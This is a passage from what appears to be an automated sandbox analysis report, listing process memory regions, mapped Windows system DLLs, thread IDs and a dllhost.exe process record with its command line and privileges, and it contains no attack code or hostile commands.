"pagefile_0x0000000000010000" filename = "" Region: id = 17818 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 17819 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17820 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17821 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 17822 start_va = 0x6c0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 17823 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 17824 start_va = 0x7ffb542d0000 end_va = 0x7ffb54328fff monitored = 0 entry_point = 0x7ffb542dfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 17825 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 17826 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 17827 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17828 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 17829 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17830 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17831 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 17832 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 17833 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17834 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17835 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 17836 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 17837 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 17838 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 17839 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 17840 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 17841 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 17842 start_va = 0xb10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 17843 start_va = 0x1f10000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 17844 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 17845 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 17846 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 17847 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 17848 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17849 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 17850 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 17851 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 17852 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 17853 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 17854 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 17855 start_va = 0x1f10000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 17856 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 17857 start_va = 0x20d0000 end_va = 0x2406fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 17858 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 17859 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 17860 start_va = 0x710000 end_va = 0x769fff monitored = 1 entry_point = 0x7253f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17861 start_va = 0x770000 end_va = 0x790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 17862 start_va = 0x2410000 end_va = 0x2622fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 17863 start_va = 0x2630000 end_va = 0x284efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 17864 start_va = 0x1f10000 end_va = 0x2024fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 17865 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 17866 start_va = 0x2850000 end_va = 0x2a68fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 17867 start_va = 0x2a70000 end_va = 0x2b82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Thread: id = 111 os_tid = 0xd3c Thread: id = 112 os_tid = 0xd24 Thread: id = 113 os_tid = 0x13cc Process: id = "13" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1a5f000" os_pid = "0x8c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17907 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17908 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 17909 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17910 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 17911 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 17912 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17913 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 17914 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 17915 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 17916 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17917 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17918 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 17919 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 17920 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17921 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 17922 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 17923 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 17924 start_va = 0x8b0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 17925 start_va = 0x9b0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 17926 start_va = 0xab0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 17927 start_va = 0xbb0000 end_va = 0xd37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 17928 start_va = 0xd40000 end_va = 0xec0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 17929 start_va = 0xed0000 end_va = 0x22cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 17930 start_va = 0x2470000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 17931 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 17932 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17933 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 17934 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 17935 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 17936 start_va = 0x7ff76b7b0000 end_va = 0x7ff76b7b6fff monitored = 0 entry_point = 0x7ff76b7b1570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 17937 start_va = 0x7ffb5b940000 end_va = 0x7ffb5bdd2fff monitored = 0 entry_point = 0x7ffb5b94f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 17938 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 17939 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 17940 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 17941 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 17942 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 17943 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 17944 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 17945 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 17946 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17947 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 17948 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 17949 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17950 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17951 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17952 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17953 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17954 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17955 start_va = 0x7ffb615e0000 end_va = 0x7ffb61686fff monitored = 0 entry_point = 0x7ffb615eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 17956 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17957 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 17958 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17959 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17963 start_va = 0x2580000 end_va = 0x28b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 17964 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 17965 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 17966 start_va = 0x22d0000 end_va = 0x2412fff monitored = 0 entry_point = 0x22f8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 17967 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 17968 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 17979 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 17980 start_va = 0x4c0000 end_va = 0x57bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 17981 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 17984 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 17985 start_va = 0x4c0000 end_va = 0x504fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 17986 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 17987 start_va = 0x510000 end_va = 0x59dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 17996 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 17997 start_va = 0x22d0000 end_va = 0x22d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022d0000" filename = "" Region: id = 17998 start_va = 0x28c0000 end_va = 0x2cbafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 17999 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022e0000" filename = "" Region: id = 18000 start_va = 0x22e0000 end_va = 0x22e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 18001 start_va = 0x22f0000 end_va = 0x2302fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 18002 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 18003 start_va = 0x22e0000 end_va = 0x22e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 18008 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 18017 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 18020 start_va = 0x7ffb5d760000 end_va = 0x7ffb5d790fff monitored = 0 entry_point = 0x7ffb5d767d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 18021 start_va = 0x7ffb48310000 end_va = 0x7ffb483abfff monitored = 0 entry_point = 0x7ffb483696a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 18022 start_va = 0x7ffb58e60000 end_va = 0x7ffb58f95fff monitored = 0 entry_point = 0x7ffb58e8f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 18025 start_va = 0x7ffb551d0000 end_va = 0x7ffb5521ffff monitored = 0 entry_point = 0x7ffb551d2580 region_type = mapped_file name = "edputil.dll" filename = 